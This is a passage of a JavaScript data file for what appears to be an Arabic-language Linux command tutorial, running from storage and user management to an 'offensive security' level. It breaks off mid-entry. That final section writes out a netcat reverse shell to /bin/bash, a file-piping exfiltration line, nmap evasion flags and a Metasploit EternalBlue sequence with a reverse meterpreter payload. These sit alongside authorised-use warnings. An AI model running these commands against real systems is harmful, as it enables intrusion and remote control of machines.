   {flag:'-o OPTIONS',desc:'خيارات التوصيل (ro, rw, noexec, nosuid...)'},
   {flag:'-a',desc:'وصّل كل ما في /etc/fstab'},
   {flag:'-r',desc:'للقراءة فقط (read-only)'},
   {flag:'--bind',desc:'وصّل مجلداً في موضع آخر'},
   {flag:'-l',desc:'اعرض كل الأجهزة الموصولة'},
 ],
 examples:[
   'mount /dev/sdb1 /mnt/data',
   'mount -t nfs 192.168.1.10:/share /mnt/nfs',
   'mount -o ro /dev/sdb1 /mnt/readonly',
   'mount -a',
 ],
},
{id:'umount',name:'umount',icon:'🔓',level:3,category:'التخزين',
 desc:'افصل نظام الملفات',
 syntax:'umount [OPTIONS] DEVICE|MOUNTPOINT',
 flags:[
   {flag:'-l',desc:'فصل كسول (lazy) — ينتظر حتى لا يستخدمه أحد'},
   {flag:'-f',desc:'فصل إجباري'},
 ],
 examples:['umount /mnt/data','umount -l /mnt/busy'],
},
// --- LVM ---
{id:'pvcreate',name:'pvcreate',icon:'🧱',level:3,category:'LVM',
 desc:'هيّئ قسماً كـ Physical Volume لـ LVM',
 syntax:'pvcreate DEVICE',
 flags:[{flag:'-f',desc:'إجباري حتى لو القرص به بيانات'}],
 examples:['pvcreate /dev/sdb1','pvcreate /dev/sdb /dev/sdc'],
},
{id:'vgcreate',name:'vgcreate',icon:'📦',level:3,category:'LVM',
 desc:'أنشئ Volume Group من Physical Volumes',
 syntax:'vgcreate VG_NAME PV_DEVICE...',
 flags:[{flag:'-s SIZE',desc:'حجم Physical Extent'}],
 examples:['vgcreate myvg /dev/sdb1','vgcreate datavg /dev/sdb /dev/sdc'],
},
{id:'lvcreate',name:'lvcreate',icon:'💾',level:3,category:'LVM',
 desc:'أنشئ Logical Volume من Volume Group',
 syntax:'lvcreate [OPTIONS] VG_NAME',
 flags:[
   {flag:'-L SIZE',desc:'الحجم (10G, 500M...)'},
   {flag:'-l PERCENT%FREE',desc:'نسبة مئوية من المساحة الحرة'},
   {flag:'-n NAME',desc:'اسم الـ LV'},
   {flag:'-T',desc:'أنشئ Thin Pool'},
 ],
 examples:[
   'lvcreate -L 10G -n data myvg',
   'lvcreate -l 100%FREE -n logs datavg',
 ],
},
{id:'lvextend',name:'lvextend',icon:'⬆️',level:3,category:'LVM',
 desc:'وسّع حجم Logical Volume',
 syntax:'lvextend [OPTIONS] LV_PATH',
 flags:[
   {flag:'-L +5G',desc:'أضف 5GB إضافية'},
   {flag:'-l +100%FREE',desc:'استخدم كل المساحة الحرة'},
   {flag:'-r',desc:'وسّع نظام الملفات أيضاً (resize2fs تلقائياً)'},
 ],
 examples:[
   'lvextend -L +5G /dev/myvg/data',
   'lvextend -l +100%FREE -r /dev/datavg/logs',
 ],
},
{id:'pvdisplay',name:'pvdisplay',icon:'👁️',level:3,category:'LVM',
 desc:'اعرض معلومات Physical Volumes',
 syntax:'pvdisplay [PV]',
 flags:[{flag:'-s',desc:'ملخص موجز'}],
 examples:['pvdisplay','pvs'],
},
{id:'vgdisplay',name:'vgdisplay',icon:'👁️',level:3,category:'LVM',
 desc:'اعرض معلومات Volume Groups',
 syntax:'vgdisplay [VG]',
 flags:[],
 examples:['vgdisplay','vgs'],
},
{id:'lvdisplay',name:'lvdisplay',icon:'👁️',level:3,category:'LVM',
 desc:'اعرض معلومات Logical Volumes',
 syntax:'lvdisplay [LV]',
 flags:[],
 examples:['lvdisplay','lvs'],
},
// --- Users Advanced ---
{id:'useradd',name:'useradd',icon:'➕',level:3,category:'إدارة المستخدمين',
 desc:'أنشئ مستخدماً جديداً',
 syntax:'useradd [OPTIONS] USERNAME',
 flags:[
   {flag:'-m',desc:'أنشئ مجلد home تلقائياً'},
   {flag:'-s SHELL',desc:'حدد الـ Shell (مثلاً /bin/bash)'},
   {flag:'-G GROUPS',desc:'أضف لمجموعات إضافية'},
   {flag:'-g GROUP',desc:'المجموعة الأساسية'},
   {flag:'-d DIR',desc:'مجلد home مخصص'},
   {flag:'-c COMMENT',desc:'وصف أو اسم المستخدم'},
   {flag:'-e DATE',desc:'تاريخ انتهاء الحساب'},
   {flag:'-u UID',desc:'تحديد UID معين'},
   {flag:'-r',desc:'حساب نظامي (system account)'},
 ],
 examples:[
   'useradd -m -s /bin/bash john',
   'useradd -m -G wheel,docker alice',
   'useradd -r -s /sbin/nologin nginx',
 ],
},
{id:'usermod',name:'usermod',icon:'✏️',level:3,category:'إدارة المستخدمين',
 desc:'عدّل إعدادات مستخدم موجود',
 syntax:'usermod [OPTIONS] USERNAME',
 flags:[
   {flag:'-aG GROUP',desc:'أضف لمجموعة إضافية (مهم: -a ضروري!)'},
   {flag:'-G GROUPS',desc:'غيّر المجموعات الإضافية (استبدال)'},
   {flag:'-s SHELL',desc:'غيّر الـ Shell'},
   {flag:'-d DIR',desc:'غيّر مجلد home'},
   {flag:'-l NEWNAME',desc:'غيّر اسم المستخدم'},
   {flag:'-e DATE',desc:'غيّر تاريخ الانتهاء'},
   {flag:'-L',desc:'أقفل الحساب (Lock)'},
   {flag:'-U',desc:'افتح الحساب (Unlock)'},
 ],
 examples:[
   'usermod -aG sudo alice',
   'usermod -s /bin/zsh bob',
   'usermod -L testuser',
 ],
 note:'usermod -aG بدون -a يستبدل المجموعات ويزيل القديمة!'
},
{id:'userdel',name:'userdel',icon:'➖',level:3,category:'إدارة المستخدمين',
 desc:'احذف مستخدماً من النظام',
 syntax:'userdel [OPTIONS] USERNAME',
 flags:[
   {flag:'-r',desc:'احذف مجلد home والملفات أيضاً'},
   {flag:'-f',desc:'إجباري حتى لو المستخدم متصل'},
 ],
 examples:['userdel john','userdel -r alice'],
},
{id:'passwd',name:'passwd',icon:'🔑',level:3,category:'إدارة المستخدمين',
 desc:'غيّر كلمة مرور المستخدم أو إعدادات الحساب',
 syntax:'passwd [OPTIONS] [USERNAME]',
 flags:[
   {flag:'-l',desc:'أقفل كلمة المرور (Lock)'},
   {flag:'-u',desc:'افك القفل'},
   {flag:'-d',desc:'احذف كلمة المرور'},
   {flag:'-e',desc:'انهِ صلاحية كلمة المرور فوراً'},
   {flag:'-n DAYS',desc:'حد أدنى لأيام تغيير كلمة المرور'},
   {flag:'-x DAYS',desc:'حد أقصى لأيام تغيير كلمة المرور'},
   {flag:'--stdin',desc:'اقرأ كلمة المرور من stdin (سكريبتات)'},
 ],
 examples:[
   'passwd',
   'passwd alice',
   'echo "newpass" | passwd --stdin alice',
   'passwd -l lockeduser',
 ],
},
{id:'groupadd',name:'groupadd',icon:'👫',level:3,category:'إدارة المستخدمين',
 desc:'أنشئ مجموعة مستخدمين جديدة',
 syntax:'groupadd [OPTIONS] GROUPNAME',
 flags:[
   {flag:'-g GID',desc:'حدد GID معيناً'},
   {flag:'-r',desc:'مجموعة نظامية'},
 ],
 examples:['groupadd developers','groupadd -g 1500 project'],
},
{id:'groupmod',name:'groupmod',icon:'✏️',level:3,category:'إدارة المستخدمين',
 desc:'عدّل مجموعة موجودة',
 syntax:'groupmod [OPTIONS] GROUPNAME',
 flags:[
   {flag:'-n NEWNAME',desc:'اسم جديد'},
   {flag:'-g GID',desc:'GID جديد'},
 ],
 examples:['groupmod -n newgroup oldgroup'],
},
{id:'su',name:'su',icon:'🦸',level:3,category:'إدارة المستخدمين',
 desc:'تبدّل إلى مستخدم آخر (Switch User)',
 syntax:'su [OPTIONS] [USER]',
 flags:[
   {flag:'-',desc:'تبدّل كجلسة كاملة مع environment المستخدم'},
   {flag:'-c CMD',desc:'نفّذ أمراً ثم عد'},
   {flag:'-s SHELL',desc:'استخدم shell محدد'},
 ],
 examples:['su - root','su - alice','su -c "cat /etc/shadow" root'],
},
{id:'sudo',name:'sudo',icon:'⚡',level:3,category:'إدارة المستخدمين',
 desc:'نفّذ أوامر بصلاحيات مستخدم آخر (عادةً root)',
 syntax:'sudo [OPTIONS] COMMAND',
 flags:[
   {flag:'-u USER',desc:'نفّذ كمستخدم محدد'},
   {flag:'-i',desc:'افتح shell تفاعلي كـ root'},
   {flag:'-l',desc:'اعرض الصلاحيات المتاحة'},
   {flag:'-v',desc:'حدّث الجلسة بدون تنفيذ'},
   {flag:'-k',desc:'أنهِ الجلسة الحالية (اطلب كلمة مرور مرة أخرى)'},
   {flag:'-b',desc:'شغّل في الخلفية'},
 ],
 examples:[
   'sudo systemctl restart nginx',
   'sudo -u postgres psql',
   'sudo -l',
   'sudo -i',
 ],
 note:'ملف الضبط: /etc/sudoers (عدّله دائماً بـ visudo لا مباشرة!)'
},
// --- Firewall ---
{id:'firewalld',name:'firewall-cmd',icon:'🔥',level:3,category:'جدار الحماية',
 desc:'إدارة جدار الحماية firewalld (RHEL/CentOS/Fedora)',
 syntax:'firewall-cmd [OPTIONS]',
 flags:[
   {flag:'--state',desc:'هل firewalld يعمل؟'},
   {flag:'--list-all',desc:'اعرض كل القواعد للمنطقة الافتراضية'},
   {flag:'--zone=ZONE',desc:'حدد منطقة (public, private, trusted...)'},
   {flag:'--add-service=SVC',desc:'السماح بخدمة (http, ssh, ftp...)'},
   {flag:'--remove-service=SVC',desc:'إزالة خدمة'},
   {flag:'--add-port=PORT/PROTO',desc:'فتح منفذ'},
   {flag:'--remove-port=PORT/PROTO',desc:'إغلاق منفذ'},
   {flag:'--permanent',desc:'تطبيق دائم (يتطلب --reload)'},
   {flag:'--reload',desc:'أعد تحميل القواعد'},
   {flag:'--list-services',desc:'اعرض الخدمات المسموحة'},
   {flag:'--list-ports',desc:'اعرض المنافذ المفتوحة'},
   {flag:'--get-zones',desc:'اعرض كل المناطق'},
   {flag:'--add-rich-rule',desc:'أضف قاعدة متقدمة'},
 ],
 examples:[
   'firewall-cmd --state',
   'firewall-cmd --list-all',
   'firewall-cmd --permanent --add-service=http --zone=public',
   'firewall-cmd --permanent --add-port=8080/tcp',
   'firewall-cmd --reload',
   'firewall-cmd --permanent --remove-service=telnet',
 ],
},
{id:'iptables',name:'iptables',icon:'🔒',level:3,category:'جدار الحماية',
 desc:'إدارة قواعد netfilter الجدارية (الكلاسيكي)',
 syntax:'iptables [OPTIONS] CHAIN RULE',
 flags:[
   {flag:'-L',desc:'اعرض القواعد'},
   {flag:'-L -n -v',desc:'اعرض بالتفصيل والأرقام'},
   {flag:'-A CHAIN',desc:'أضف قاعدة في النهاية (Append)'},
   {flag:'-I CHAIN N',desc:'أدرج قاعدة في موضع N'},
   {flag:'-D CHAIN N',desc:'احذف القاعدة رقم N'},
   {flag:'-F',desc:'احذف كل القواعد (Flush)'},
   {flag:'-P CHAIN POLICY',desc:'حدد السياسة الافتراضية'},
   {flag:'-p PROTO',desc:'البروتوكول (tcp, udp, icmp)'},
   {flag:'-s IP',desc:'عنوان المصدر'},
   {flag:'-d IP',desc:'عنوان الوجهة'},
   {flag:'--dport PORT',desc:'منفذ الوجهة'},
   {flag:'-j TARGET',desc:'الهدف (ACCEPT, DROP, REJECT)'},
   {flag:'-n',desc:'لا تحوّل IP لأسماء'},
 ],
 examples:[
   'iptables -L -n -v',
   'iptables -A INPUT -p tcp --dport 80 -j ACCEPT',
   'iptables -A INPUT -s 192.168.1.0/24 -j ACCEPT',
   'iptables -A INPUT -j DROP',
 ],
},
// --- Archives ---
{id:'tar',name:'tar',icon:'📦',level:3,category:'الأرشفة',
 desc:'أنشئ أو استخرج أرشيفات tar (Tape Archive)',
 syntax:'tar [OPTIONS] [FILE...]',
 flags:[
   {flag:'-c',desc:'أنشئ أرشيفاً جديداً (Create)'},
   {flag:'-x',desc:'استخرج الأرشيف (Extract)'},
   {flag:'-t',desc:'اعرض محتوى الأرشيف بدون استخراج'},
   {flag:'-v',desc:'Verbose — اعرض الملفات'},
   {flag:'-f FILE',desc:'اسم ملف الأرشيف'},
   {flag:'-z',desc:'ضغط gzip (.tar.gz أو .tgz)'},
   {flag:'-j',desc:'ضغط bzip2 (.tar.bz2)'},
   {flag:'-J',desc:'ضغط xz (.tar.xz)'},
   {flag:'-C DIR',desc:'استخرج في مجلد محدد'},
   {flag:'--exclude',desc:'استثنِ ملفات أو مجلدات'},
   {flag:'-p',desc:'احتفظ بالصلاحيات'},
   {flag:'--incremental',desc:'نسخ احتياطية تراكمية'},
 ],
 examples:[
   'tar -czvf archive.tar.gz /path/to/dir',
   'tar -xzvf archive.tar.gz',
   'tar -xzvf archive.tar.gz -C /opt/',
   'tar -tvf archive.tar.gz',
   "tar -czvf backup.tar.gz --exclude='*.log' /var/www/",
 ],
 note:'التذكير: c=إنشاء x=استخراج t=قائمة v=تفاصيل f=ملف z=gzip'
},
{id:'gzip',name:'gzip',icon:'🗜️',level:3,category:'الأرشفة',
 desc:'ضغط/فك ضغط الملفات بصيغة gzip',
 syntax:'gzip [OPTIONS] FILE',
 flags:[
   {flag:'-d',desc:'فك الضغط (gunzip)'},
   {flag:'-k',desc:'احتفظ بالملف الأصلي'},
   {flag:'-v',desc:'اعرض معدل الضغط'},
   {flag:'-9',desc:'أقصى ضغط (أبطأ)'},
   {flag:'-1',desc:'أسرع ضغط (أقل ضغطاً)'},
   {flag:'-r',desc:'ضغط تكراري للمجلدات'},
 ],
 examples:['gzip file.txt','gzip -d file.gz','gzip -9 largefile','gunzip archive.gz'],
},
{id:'zip',name:'zip/unzip',icon:'🗜️',level:3,category:'الأرشفة',
 desc:'إنشاء وفك ضغط أرشيفات zip',
 syntax:'zip [OPTIONS] ARCHIVE FILES | unzip [OPTIONS] ARCHIVE',
 flags:[
   {flag:'-r',desc:'تضمين المجلدات تكرارياً'},
   {flag:'-e',desc:'تشفير بكلمة مرور'},
   {flag:'-9',desc:'أقصى ضغط'},
   {flag:'-l',desc:'(unzip) اعرض المحتوى'},
   {flag:'-d DIR',desc:'(unzip) استخرج في مجلد'},
   {flag:'-p PASS',desc:'(unzip) كلمة المرور'},
 ],
 examples:[
   'zip archive.zip file1 file2',
   'zip -r project.zip /opt/project/',
   'unzip archive.zip',
   'unzip archive.zip -d /opt/',
 ],
},

// ╔══════════════════════════════════════════════╗
// ║  LEVEL 4 — EXPERT (إدارة متقدمة)            ║
// ╚══════════════════════════════════════════════╝
{id:'strace',name:'strace',icon:'🔬',level:4,category:'التشخيص',
 desc:'تتبع استدعاءات النظام (system calls) لأي عملية',
 syntax:'strace [OPTIONS] COMMAND',
 flags:[
   {flag:'-p PID',desc:'التق بعملية جارية'},
   {flag:'-e CALL',desc:'تتبع استدعاءات محددة فقط (مثل -e open)'},
   {flag:'-o FILE',desc:'احفظ الإخراج في ملف'},
   {flag:'-c',desc:'إحصائيات وتلخيص'},
   {flag:'-f',desc:'تتبع العمليات الفرعية أيضاً'},
   {flag:'-T',desc:'اعرض وقت كل استدعاء'},
   {flag:'-s N',desc:'حد أقصى لطول النص المعروض'},
 ],
 examples:[
   'strace ls /tmp',
   'strace -p 1234',
   'strace -e open,read cat /etc/passwd',
   'strace -c ls',
 ],
 note:'strace أداة ذهبية لتشخيص الأخطاء الغامضة!'
},
{id:'lsof',name:'lsof',icon:'📂',level:4,category:'التشخيص',
 desc:'اعرض الملفات المفتوحة وما يفتحها (List Open Files)',
 syntax:'lsof [OPTIONS] [PATH]',
 flags:[
   {flag:'-p PID',desc:'ملفات عملية محددة'},
   {flag:'-u USER',desc:'ملفات مستخدم محدد'},
   {flag:'-i',desc:'اعرض المقابس الشبكية'},
   {flag:'-i :PORT',desc:'العمليات على منفذ محدد'},
   {flag:'-i TCP',desc:'اتصالات TCP'},
   {flag:'+D DIR',desc:'الملفات المفتوحة في مجلد'},
   {flag:'-c NAME',desc:'العمليات التي اسمها يبدأ بـ NAME'},
   {flag:'-n',desc:'لا تحوّل IP لأسماء'},
   {flag:'-t',desc:'أعد PID فقط (للاستخدام مع kill)'},
   {flag:'-d FD',desc:'حدد file descriptor'},
 ],
 examples:[
   'lsof -i :80',
   'lsof -u alice',
   'lsof -p 1234',
   'lsof +D /var/log/',
   'lsof -i TCP:22',
   'kill $(lsof -t -i :3000)',
 ],
},
{id:'tcpdump',name:'tcpdump',icon:'🌊',level:4,category:'الشبكات المتقدمة',
 desc:'التقاط وتحليل حزم الشبكة',
 syntax:'tcpdump [OPTIONS] [FILTER]',
 flags:[
   {flag:'-i INTERFACE',desc:'الواجهة الشبكية (eth0, any)'},
   {flag:'-n',desc:'لا تحوّل IP لأسماء'},
   {flag:'-nn',desc:'لا تحوّل IP ولا منافذ'},
   {flag:'-c N',desc:'التقط N حزمة فقط'},
   {flag:'-w FILE',desc:'احفظ في ملف .pcap للتحليل بـ Wireshark'},
   {flag:'-r FILE',desc:'اقرأ من ملف .pcap'},
   {flag:'-v/-vv/-vvv',desc:'تفاصيل أكثر'},
   {flag:'-A',desc:'اعرض محتوى الحزمة كنص ASCII'},
   {flag:'-X',desc:'اعرض بـ hex وASCII'},
   {flag:'host IP',desc:'فلتر حسب IP'},
   {flag:'port N',desc:'فلتر حسب المنفذ'},
   {flag:'tcp/udp/icmp',desc:'فلتر حسب البروتوكول'},
   {flag:'src/dst',desc:'مصدر أو وجهة'},
 ],
 examples:[
   'tcpdump -i eth0',
   'tcpdump -i any -nn port 80',
   'tcpdump -i eth0 -w capture.pcap',
   'tcpdump -nn host 192.168.1.1 and port 443',
   'tcpdump -A -i eth0 port 80',
 ],
 note:'tcpdump بحاجة لـ root أو CAP_NET_RAW. الملفات .pcap تُفتح بـ Wireshark.'
},
{id:'sar',name:'sar',icon:'📈',level:4,category:'الأداء',
 desc:'تحليل أداء النظام التاريخي والحي (System Activity Reporter)',
 syntax:'sar [OPTIONS] [INTERVAL [COUNT]]',
 flags:[
   {flag:'-u',desc:'استخدام CPU'},
   {flag:'-r',desc:'استخدام الذاكرة'},
   {flag:'-d',desc:'نشاط الأقراص'},
   {flag:'-n DEV',desc:'إحصائيات الشبكة (DEV, TCP, UDP...)'},
   {flag:'-q',desc:'حمل النظام وعدد العمليات'},
   {flag:'-f FILE',desc:'اقرأ من ملف سجل قديم'},
   {flag:'-o FILE',desc:'احفظ في ملف'},
   {flag:'-A',desc:'كل الإحصائيات'},
 ],
 examples:[
   'sar -u 1 5',
   'sar -r 1 3',
   'sar -d 1 3',
   'sar -n DEV 1 3',
   'sar -f /var/log/sa/sa01',
 ],
},
{id:'vmstat',name:'vmstat',icon:'💻',level:4,category:'الأداء',
 desc:'إحصائيات الذاكرة والـ swap والعمليات والـ I/O والـ CPU',
 syntax:'vmstat [OPTIONS] [DELAY [COUNT]]',
 flags:[
   {flag:'-a',desc:'اعرض الذاكرة النشطة/غير النشطة'},
   {flag:'-s',desc:'جدول الذاكرة التفصيلي'},
   {flag:'-d',desc:'إحصائيات الأقراص'},
   {flag:'-m',desc:'slabs (ذاكرة kernel)'},
   {flag:'-n',desc:'اعرض الرأس مرة واحدة فقط'},
 ],
 examples:['vmstat 1 5','vmstat -s','vmstat -d'],
},
{id:'iostat',name:'iostat',icon:'💽',level:4,category:'الأداء',
 desc:'إحصائيات أداء الأجهزة و CPU (I/O Statistics)',
 syntax:'iostat [OPTIONS] [DELAY [COUNT]]',
 flags:[
   {flag:'-x',desc:'إحصائيات موسّعة'},
   {flag:'-d',desc:'أقراص فقط'},
   {flag:'-c',desc:'CPU فقط'},
   {flag:'-m',desc:'بـ MB/s بدل KB/s'},
   {flag:'-h',desc:'حجم مقروء'},
 ],
 examples:['iostat -x 1 5','iostat -d -m','iostat -xm 2'],
},
{id:'selinux',name:'getenforce',icon:'🛡️',level:4,category:'SELinux',
 desc:'اعرض وضع SELinux (Enforcing / Permissive / Disabled)',
 syntax:'getenforce',
 flags:[],
 examples:['getenforce','setenforce 0 # مؤقت Permissive','setenforce 1 # مؤقت Enforcing'],
 note:'للتغيير الدائم: عدّل /etc/selinux/config'
},
{id:'sestatus',name:'sestatus',icon:'🛡️',level:4,category:'SELinux',
 desc:'اعرض تفاصيل حالة SELinux',
 syntax:'sestatus [OPTIONS]',
 flags:[{flag:'-v',desc:'تفاصيل إضافية'},{flag:'-b',desc:'حالة القيود المنطقية'}],
 examples:['sestatus','sestatus -v'],
},
{id:'chcon',name:'chcon',icon:'🏷️',level:4,category:'SELinux',
 desc:'غيّر سياق SELinux للملفات (Context)',
 syntax:'chcon [OPTIONS] CONTEXT FILE',
 flags:[
   {flag:'-R',desc:'تكراري'},
   {flag:'-t TYPE',desc:'غيّر النوع فقط'},
   {flag:'--reference',desc:'انسخ السياق من ملف آخر'},
 ],
 examples:[
   'chcon -t httpd_sys_content_t /var/www/html/index.html',
   'chcon -R -t samba_share_t /shared/',
 ],
},
{id:'restorecon',name:'restorecon',icon:'🔄',level:4,category:'SELinux',
 desc:'استعد السياق الافتراضي لـ SELinux للملفات',
 syntax:'restorecon [OPTIONS] FILE',
 flags:[
   {flag:'-R',desc:'تكراري'},
   {flag:'-v',desc:'اعرض التغييرات'},
   {flag:'-n',desc:'محاكاة بدون تطبيق'},
 ],
 examples:['restorecon -Rv /var/www/html/','restorecon -v /etc/ssh/sshd_config'],
},
{id:'setsebool',name:'setsebool',icon:'🔘',level:4,category:'SELinux',
 desc:'اضبط قيم SELinux Booleans',
 syntax:'setsebool [OPTIONS] BOOLEAN VALUE',
 flags:[
   {flag:'-P',desc:'دائم (يحفظ بعد الإقلاع)'},
 ],
 examples:[
   'setsebool -P httpd_can_network_connect on',
   'getsebool -a | grep httpd',
   'setsebool -P allow_ftpd_full_access on',
 ],
},
{id:'auditctl',name:'auditctl',icon:'📋',level:4,category:'التدقيق',
 desc:'إدارة قواعد نظام التدقيق Auditd',
 syntax:'auditctl [OPTIONS]',
 flags:[
   {flag:'-l',desc:'اعرض القواعد الحالية'},
   {flag:'-w PATH',desc:'راقب ملفاً أو مجلداً'},
   {flag:'-p rwxa',desc:'أحداث (r=قراءة w=كتابة x=تنفيذ a=تعديل خصائص)'},
   {flag:'-k TAG',desc:'علامة للبحث في السجلات'},
   {flag:'-a action,filter',desc:'أضف قاعدة للعمليات'},
 ],
 examples:[
   'auditctl -l',
   'auditctl -w /etc/passwd -p rwa -k passwd_changes',
   'auditctl -w /etc/shadow -p rwxa -k shadow_watch',
 ],
},
{id:'ausearch',name:'ausearch',icon:'🔍',level:4,category:'التدقيق',
 desc:'ابحث في سجلات Audit',
 syntax:'ausearch [OPTIONS]',
 flags:[
   {flag:'-k TAG',desc:'ابحث بعلامة محددة'},
   {flag:'-m TYPE',desc:'نوع الحدث (USER_LOGIN, SYSCALL...)'},
   {flag:'-ts DATE',desc:'منذ تاريخ'},
   {flag:'-te DATE',desc:'حتى تاريخ'},
   {flag:'-i',desc:'ترجم الأرقام لأسماء'},
   {flag:'-ui UID',desc:'أحداث مستخدم محدد'},
 ],
 examples:[
   'ausearch -k passwd_changes',
   'ausearch -m USER_LOGIN -ts today',
   'ausearch -i -k shadow_watch',
 ],
},
{id:'openssl',name:'openssl',icon:'🔐',level:4,category:'التشفير',
 desc:'أداة تشفير شاملة (شهادات، مفاتيح، تشفير بيانات)',
 syntax:'openssl COMMAND [OPTIONS]',
 flags:[
   {flag:'genrsa -out key.pem 2048',desc:'أنشئ مفتاح RSA'},
   {flag:'req -new -key key.pem -out csr.pem',desc:'أنشئ طلب شهادة CSR'},
   {flag:'x509 -req -in csr.pem -signkey key.pem -out cert.pem',desc:'وقّع الشهادة'},
   {flag:'s_client -connect HOST:443',desc:'اختبر اتصال SSL/TLS'},
   {flag:'enc -aes-256-cbc -in file -out file.enc',desc:'شفّر ملفاً'},
   {flag:'dgst -sha256 file',desc:'احسب SHA256 للملف'},
   {flag:'passwd -1 "password"',desc:'أنشئ Hash لكلمة مرور'},
   {flag:'pkcs12 -export',desc:'أنشئ ملف PKCS12'},
 ],
 examples:[
   'openssl genrsa -out private.pem 2048',
   'openssl s_client -connect google.com:443',
   'openssl dgst -sha256 file.iso',
   'openssl enc -aes-256-cbc -in secret.txt -out secret.enc',
 ],
},
{id:'ssh_keygen',name:'ssh-keygen',icon:'🗝️',level:4,category:'التشفير',
 desc:'إنشاء وإدارة مفاتيح SSH',
 syntax:'ssh-keygen [OPTIONS]',
 flags:[
   {flag:'-t TYPE',desc:'نوع المفتاح (rsa, ed25519, ecdsa)'},
   {flag:'-b BITS',desc:'حجم المفتاح (2048, 4096)'},
   {flag:'-f FILE',desc:'اسم ملف المفتاح'},
   {flag:'-C COMMENT',desc:'تعليق (عادةً email)'},
   {flag:'-N PASS',desc:'passphrase (فارغ = بدون)'},
   {flag:'-p',desc:'غيّر الـ passphrase'},
   {flag:'-R HOST',desc:'احذف مفتاح host من known_hosts'},
 ],
 examples:[
   'ssh-keygen -t ed25519 -C "user@email.com"',
   'ssh-keygen -t rsa -b 4096 -f ~/.ssh/my_server',
   'ssh-copy-id user@remote-server',
 ],
},

// ╔══════════════════════════════════════════════╗
// ║  LEVEL 5 — OFFENSIVE SECURITY (أمن هجومي)   ║
// ╚══════════════════════════════════════════════╝
{id:'nmap',name:'nmap',icon:'🗺️',level:5,category:'الاستطلاع',
 desc:'ماسح الشبكات والمنافذ الأقوى (Network Mapper)',
 syntax:'nmap [OPTIONS] TARGET',
 flags:[
   {flag:'-sS',desc:'TCP SYN Scan (Stealth) — يحتاج root'},
   {flag:'-sT',desc:'TCP Connect Scan (بدون root)'},
   {flag:'-sU',desc:'UDP Scan'},
   {flag:'-sV',desc:'اكتشف نسخ الخدمات'},
   {flag:'-O',desc:'اكتشف نظام التشغيل'},
   {flag:'-A',desc:'فحص شامل (OS + Version + Scripts + Traceroute)'},
   {flag:'-p PORT',desc:'حدد المنافذ (80, 1-1000, -)'},
   {flag:'-p-',desc:'فحص كل المنافذ (65535)'},
   {flag:'-T0-T5',desc:'سرعة الفحص (0=بطيء جداً, 5=جنوني)'},
   {flag:'-n',desc:'لا تحوّل IP لأسماء'},
   {flag:'-Pn',desc:'تجاهل ping — افترض أن الهدف نشط'},
   {flag:'-oN FILE',desc:'حفظ بصيغة عادية'},
   {flag:'-oX FILE',desc:'حفظ بصيغة XML'},
   {flag:'-oG FILE',desc:'حفظ بصيغة Grepable'},
   {flag:'--script SCRIPT',desc:'شغّل NSE scripts'},
   {flag:'--script=vuln',desc:'ابحث عن ثغرات معروفة'},
   {flag:'-D DECOY',desc:'استخدم عناوين Decoy للتمويه'},
   {flag:'-f',desc:'تجزئة الحزم (Fragmentation)'},
   {flag:'--spoof-mac',desc:'انتحال MAC Address'},
 ],
 examples:[
   'nmap 192.168.1.1',
   'nmap -sV -p 22,80,443 192.168.1.100',
   'nmap -A -T4 192.168.1.0/24',
   'nmap -p- --min-rate 5000 -Pn 10.10.10.10',
   'nmap --script=vuln 192.168.1.1',
   'nmap -sU -p 53,161 192.168.1.1',
 ],
 note:'⚠️ استخدم nmap فقط على أنظمة تملك إذناً صريحاً بفحصها!'
},
{id:'netcat',name:'nc (netcat)',icon:'🐱',level:5,category:'الاستطلاع',
 desc:'أداة TCP/UDP متعددة الاستخدام — Swiss Army Knife للشبكات',
 syntax:'nc [OPTIONS] HOST PORT',
 flags:[
   {flag:'-l',desc:'وضع الاستماع (Listen)'},
   {flag:'-p PORT',desc:'حدد المنفذ'},
   {flag:'-v',desc:'Verbose'},
   {flag:'-n',desc:'لا تحوّل IP لأسماء'},
   {flag:'-u',desc:'استخدم UDP'},
   {flag:'-z',desc:'فحص المنافذ بدون إرسال بيانات (Zero I/O)'},
   {flag:'-w N',desc:'مهلة N ثانية'},
   {flag:'-e CMD',desc:'نفّذ أمراً بعد الاتصال (Reverse Shell!)'},
 ],
 examples:[
   'nc -zv 192.168.1.1 22',
   'nc -zv 192.168.1.1 1-100',
   'nc -lvp 4444',
   'nc 192.168.1.100 4444 -e /bin/bash',
   'nc -l -p 8080 > received_file',
   'cat file | nc remote_host 9999',
 ],
 note:'⚠️ nc يُستخدم في Reverse Shells والاختراق — استخدم فقط في بيئات مخصصة!'
},
{id:'metasploit',name:'msfconsole',icon:'💉',level:5,category:'الاختراق',
 desc:'واجهة Metasploit Framework — منصة الاختراق الأشهر في العالم',
 syntax:'msfconsole',
 flags:[
   {flag:'search NAME',desc:'ابحث عن Exploit أو Module'},
   {flag:'use MODULE',desc:'حدد Module للاستخدام'},
   {flag:'show options',desc:'اعرض الخيارات المطلوبة'},
   {flag:'set OPTION VALUE',desc:'حدد قيمة خيار'},
   {flag:'exploit / run',desc:'شغّل الـ Exploit'},
   {flag:'sessions',desc:'اعرض الجلسات النشطة'},
   {flag:'sessions -i N',desc:'اتصل بجلسة N'},
   {flag:'background',desc:'أرسل الجلسة للخلفية'},
   {flag:'info MODULE',desc:'معلومات عن Module'},
   {flag:'show payloads',desc:'اعرض Payloads المتاحة'},
   {flag:'generate -f FORMAT',desc:'أنشئ Payload'},
 ],
 examples:[
   'msfconsole',
   'search ms17-010',
   'use exploit/windows/smb/ms17_010_eternalblue',
   'set RHOSTS 192.168.1.100',
   'set PAYLOAD windows/x64/meterpreter/reverse_tcp',
   'run',
 ],
 note:'⚠️ Metasploit يُستخدم في Penetration Testing المرخص فقط. الاستخدام غير المرخص جريمة!'
},
{id:'hydra',name:'hydra',icon:'🐉',level:5,category:'كلمات المرور',
 desc:'أداة اختراق كلمات مرور عبر بروتوكولات متعددة (THC Hydra)',
 syntax:'hydra [OPTIONS] TARGET SERVICE',
 flags:[
   {flag:'-l USER',desc:'اسم مستخدم واحد'},
   {flag:'-L FILE',desc:'قائمة أسماء مستخدمين'},
   {flag:'-p PASS',desc:'كلمة مرور واحدة'},
   {flag:'-P FILE',desc:'قائمة كلمات مرور'},
   {flag:'-t N',desc:'عدد الخيوط المتوازية'},
   {flag:'-s PORT',desc:'منفذ مخصص'},
   {flag:'-v/-V',desc:'Verbose (V لكل محاولة)'},
   {flag:'-o FILE',desc:'احفظ النتائج'},
   {flag:'-f',desc:'توقف بعد أول نجاح'},
   {flag:'ssh/ftp/http/smb',desc:'البروتوكول المستهدف'},
 ],
 examples:[
